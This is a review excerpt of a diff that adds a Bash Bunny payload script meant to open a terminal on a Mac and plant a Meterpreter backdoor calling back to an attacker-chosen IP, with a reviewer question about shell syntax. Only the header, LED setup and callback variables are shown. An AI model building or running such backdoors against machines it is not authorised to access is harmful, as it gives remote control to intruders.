payloads/library/msfpwnmac/payload.txt

```diff
@@ -0,0 +1,55 @@
+#!/bin/bash
+#
+# Title:         Metasploit PWN Mac
+# Author:        kmakblob
+# Version:       1.2
+#
+# Opens up a terminal and sets up a backdoor (meterpeter)
+# the receiving IP can either be the BashBunny's or a custom one
+#
+# Amber..............Starting Payload
+# Red................GNU Base64 is not installed on the Bunny! Go do that!
+# Green..............Finished
+#
+ATTACKMODE HID
+
+LED G R
+
+customphonehome=0
+customphonehomeip="If you are not using the BashBunny (ssh) as your receiver then put an ip for one here"
+msfport="Place the port you would like to listen on here"
+source bunny_helpers.sh
+
+
+if ["$customphonehome" = 0]; then
+  msfip=$HOST_IP
+elif ["$customphonehome" = 1]; then
+  msfip=$customphonehomeip
+fi
+
+command -v base64 >/dev/null 2>&1 || { LED R }
```

Comment:
Oh cool, does the script exit here after `LED R`? I haven't seen braces after an `||` before